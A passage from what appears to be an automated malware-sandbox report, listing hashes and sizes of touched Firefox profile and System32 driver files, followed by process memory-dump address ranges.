                                                            37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

                                                            SHA512

                                                            eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

                                                            Filesize

                                                            116B

                                                            MD5

                                                            ae29912407dfadf0d683982d4fb57293

                                                            SHA1

                                                            0542053f5a6ce07dc206f69230109be4a5e25775

                                                            SHA256

                                                            fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

                                                            SHA512

                                                            6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json

                                                            Filesize

                                                            1001B

                                                            MD5

                                                            32aeacedce82bafbcba8d1ade9e88d5a

                                                            SHA1

                                                            a9b4858d2ae0b6595705634fd024f7e076426a24

                                                            SHA256

                                                            4ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce

                                                            SHA512

                                                            67dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll

                                                            Filesize

                                                            18.5MB

                                                            MD5

                                                            1b32d1ec35a7ead1671efc0782b7edf0

                                                            SHA1

                                                            8e3274b9f2938ff2252ed74779dd6322c601a0c8

                                                            SHA256

                                                            3ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648

                                                            SHA512

                                                            ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                            Filesize

                                                            8KB

                                                            MD5

                                                            2d7aa9f200519a7341a7a20db0349b61

                                                            SHA1

                                                            09247feafc2f3ba769ce0a09fd43074c78778051

                                                            SHA256

                                                            8abf87758c2a0daf4bb16cb858d02c65f65752edfa560cbc6cbe1cb942056550

                                                            SHA512

                                                            95ab3ecc603e4b3b1f98003c104770efe8fb6e2dd986b62fda73cfc3dc364de56fabcba4199f9860756d6372c0f49b4e1d1e227a35e1f01612cea86402d670e0

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                            Filesize

                                                            12KB

                                                            MD5

                                                            0b0978ecc8bedea46a34fdbab7d723b0

                                                            SHA1

                                                            ed385f77e282a166e331a40400b27fe8b3305ae6

                                                            SHA256

                                                            31dd62caef191b6fbb5bdc08b4f46009be681a194dc65349b89069ed99c04bdd

                                                            SHA512

                                                            06db5299a27def383d58052bb6ea27d7e81224e1218770ff7e7941f895f1266c2527ffc386b847f21507c75be6b139abc09cb6c88f0902dfc663d174cca031f9

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            18d825527fee24ff59d1e2eca3ebf670

                                                            SHA1

                                                            cde8aa38d7e5eeacbf34f04dd7a7490bf4db2e35

                                                            SHA256

                                                            0c564fb1680cb6bdf02b6a7e181610a6b75283db6234974f86cad1510c3ba296

                                                            SHA512

                                                            ae556ced4049c48e80946c7f742c3c9758ebb55dfaa48b4804225c784fc2077901d205dc74513ea3f748995cc2204a3097f73f0b5b0fbf7bad356e2c4a7acb1b

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            9b8b425c101576f2bc9168d05687bcd1

                                                            SHA1

                                                            02444d80ef6633ed2444dff4c509da6aa8a8ad56

                                                            SHA256

                                                            c72f8f04cd3c956798351686ae0b7be9044adfa940f1c17fdf7d9c3b8292da18

                                                            SHA512

                                                            ef1ec191e305c179251f259a0052e55e618103cd99a5cdb6b2e03d767faf2e0057476c9feb380324f8aa6510174bc60bc5417ba05ffaec0cb1d9ce1a6bb69d00

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            bf310d430c132eded103445d58122c77

                                                            SHA1

                                                            048e5f22b62d1d8bc06c8d533d9ec73abb22d21c

                                                            SHA256

                                                            d00e4a3efea88b3c5f5e9aab8e4f2921c41009df4a37dc7d008c8c526b0d6aac

                                                            SHA512

                                                            f5f84e6bd62881668cc4787234bfec9f6d689538db9214065bec7736e01ae4dc3cdc958585b0e3832bddda5122ba47ede6738591a882acd2278dc48e8d16e17c

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                            Filesize

                                                            10.3MB

                                                            MD5

                                                            d1e8da8b6c78a8cdfed0ec08bb9eb81c

                                                            SHA1

                                                            4bbd66796c474d615a5c3ba392bb168ee4d2bb23

                                                            SHA256

                                                            cf55b3c1c90c6f457c15fc5d7ab27e9796c0ba4a4df56ca2213775ef475dc41f

                                                            SHA512

                                                            6c09172259d6843058d9842dd64161cc3b024665be05c13c1c09e3546361e726355bb1f97a389a9ccdf116b529b64a2cc89ee6a16673ce43003de49a2cc69f49

                                                          • C:\Windows\System32\drivers\klupd_b296ad91a_klark.sys

                                                            Filesize

                                                            355KB

                                                            MD5

                                                            9cfe1ced0752035a26677843c0cbb4e3

                                                            SHA1

                                                            e8833ac499b41beb6763a684ba60333cdf955918

                                                            SHA256

                                                            3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                            SHA512

                                                            29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                          • C:\Windows\System32\drivers\klupd_b296ad91a_klbg.sys

                                                            Filesize

                                                            199KB

                                                            MD5

                                                            424b93cb92e15e3f41e3dd01a6a8e9cc

                                                            SHA1

                                                            2897ab04f69a92218bfac78f085456f98a18bdd3

                                                            SHA256

                                                            ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                            SHA512

                                                            15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                          • C:\Windows\System32\drivers\klupd_b296ad91a_mark.sys

                                                            Filesize

                                                            260KB

                                                            MD5

                                                            66522d67917b7994ddfb5647f1c3472e

                                                            SHA1

                                                            f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                            SHA256

                                                            5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                            SHA512

                                                            921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                          • memory/2140-53-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/2140-19-0x0000000000DE1000-0x0000000000E0F000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/2140-52-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/2140-18-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/2140-21-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/2140-20-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/2820-76-0x0000000000BF0000-0x0000000000BF2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/2820-86-0x000002025ED80000-0x000002025EDF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/2820-85-0x000002025ED80000-0x000002025EDF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/2820-84-0x000002025ED80000-0x000002025EDF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/2820-77-0x000002025ED80000-0x000002025EDF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/3164-33547-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3164-33530-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3932-1-0x0000000077A54000-0x0000000077A56000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3932-4-0x00000000000E0000-0x000000000058B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3932-3-0x00000000000E0000-0x000000000058B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3932-2-0x00000000000E1000-0x000000000010F000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/3932-17-0x00000000000E0000-0x000000000058B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3932-0-0x00000000000E0000-0x000000000058B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/4056-87-0x00000273BA010000-0x00000273BA032000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4308-73-0x0000000000400000-0x000000000069A000-memory.dmp

                                                            Filesize

                                                            2.6MB

                                                          • memory/5044-163-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-158-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-153-0x0000000140000000-0x000000014043F000-memory.dmp

                                                            Filesize

                                                            4.2MB

                                                          • memory/5044-166-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-164-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-162-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-160-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-156-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-155-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-167-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-165-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-161-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-159-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5044-157-0x0000000000900000-0x0000000000A88000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/6344-32239-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/6344-32237-0x0000000000DE0000-0x000000000128B000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/7332-32283-0x0000000006310000-0x000000000635C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/7332-32265-0x0000000005430000-0x0000000005A58000-memory.dmp

                                                            Filesize

                                                            6.2MB

                                                          • memory/7332-32314-0x0000000008630000-0x0000000008BD4000-memory.dmp

                                                            Filesize

                                                            5.6MB

                                                          • memory/7332-32313-0x0000000007730000-0x0000000007752000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/7332-32312-0x00000000077A0000-0x0000000007836000-memory.dmp

                                                            Filesize

                                                            600KB

                                                          • memory/7332-32285-0x0000000006800000-0x000000000681A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/7332-32284-0x0000000007A00000-0x000000000807A000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                          • memory/7332-32263-0x0000000002920000-0x0000000002956000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/7332-32281-0x00000000062C0000-0x00000000062DE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/7332-32279-0x0000000005DE0000-0x0000000006134000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/7332-32269-0x0000000005C30000-0x0000000005C96000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/7332-32268-0x0000000005B50000-0x0000000005BB6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/7332-32267-0x00000000053B0000-0x00000000053D2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/7636-34340-0x0000000000400000-0x0000000000CCA000-memory.dmp

                                                            Filesize

                                                            8.8MB

                                                          • memory/7636-39175-0x0000000000400000-0x0000000000CCA000-memory.dmp

                                                            Filesize

                                                            8.8MB

                                                          • memory/8364-32322-0x0000000000D30000-0x00000000011DF000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/8364-32328-0x0000000000D30000-0x00000000011DF000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/8712-32339-0x0000000005C90000-0x0000000005FE4000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/8712-32341-0x00000000061D0000-0x000000000621C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/9608-32376-0x0000000005600000-0x0000000005954000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/9608-32378-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/9680-33512-0x0000000000A50000-0x0000000000ECE000-memory.dmp

                                                            Filesize

                                                            4.5MB

                                                          • memory/9680-33470-0x0000000000A50000-0x0000000000ECE000-memory.dmp

                                                            Filesize

                                                            4.5MB

                                                          • memory/9680-32975-0x0000000000A50000-0x0000000000ECE000-memory.dmp

                                                            Filesize

                                                            4.5MB

                                                          • memory/9680-32974-0x0000000000A50000-0x0000000000ECE000-memory.dmp

                                                            Filesize

                                                            4.5MB

                                                          • memory/9680-32957-0x0000000000A50000-0x0000000000ECE000-memory.dmp

                                                            Filesize

                                                            4.5MB

                                                          • memory/10384-32404-0x00000000002A0000-0x000000000074F000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/10384-32407-0x00000000002A0000-0x000000000074F000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/10864-32425-0x0000000000BC0000-0x0000000000ED3000-memory.dmp

                                                            Filesize

                                                            3.1MB

                                                          • memory/10864-32423-0x0000000000BC0000-0x0000000000ED3000-memory.dmp

                                                            Filesize

                                                            3.1MB

                                                          • memory/10896-33919-0x0000000000400000-0x0000000000E06000-memory.dmp

                                                            Filesize

                                                            10.0MB

                                                          • memory/10896-33950-0x0000000000400000-0x0000000000E06000-memory.dmp

                                                            Filesize

                                                            10.0MB